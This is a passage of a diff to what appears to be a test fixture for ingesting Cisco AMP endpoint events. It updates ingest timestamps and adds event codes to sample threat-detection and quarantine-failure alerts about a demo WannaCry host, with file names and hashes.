                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275399255032000",
@@ -6602,8 +6684,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421066971Z",
+                "ingested": "2021-09-30T00:14:44.025440745Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275399255032000",
@@ -6691,8 +6774,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421068709Z",
+                "ingested": "2021-09-30T00:14:44.025443013Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275399255032000",
@@ -6764,8 +6848,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421070451Z",
+                "ingested": "2021-09-30T00:14:44.025445273Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419275399255032000",
@@ -6835,8 +6920,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421072188Z",
+                "ingested": "2021-09-30T00:14:44.025451903Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275394960065000",
@@ -6910,8 +6996,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421073943Z",
+                "ingested": "2021-09-30T00:14:44.025455291Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275394960065000",
@@ -6985,8 +7072,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421075665Z",
+                "ingested": "2021-09-30T00:14:44.025457585Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419275394960065000",
@@ -7076,8 +7164,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421086725Z",
+                "ingested": "2021-09-30T00:14:44.025459833Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7165,8 +7254,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421088660Z",
+                "ingested": "2021-09-30T00:14:44.025462032Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7254,8 +7344,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421090483Z",
+                "ingested": "2021-09-30T00:14:44.025468432Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7343,8 +7434,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421092286Z",
+                "ingested": "2021-09-30T00:14:44.025471879Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7432,8 +7524,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421094070Z",
+                "ingested": "2021-09-30T00:14:44.025474160Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7521,8 +7614,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421095862Z",
+                "ingested": "2021-09-30T00:14:44.025476413Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7610,8 +7704,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421097648Z",
+                "ingested": "2021-09-30T00:14:44.025478624Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7699,8 +7794,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421099458Z",
+                "ingested": "2021-09-30T00:14:44.025480920Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419275394960065000",
@@ -7788,8 +7884,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421101247Z",
+                "ingested": "2021-09-30T00:14:44.025483136Z",
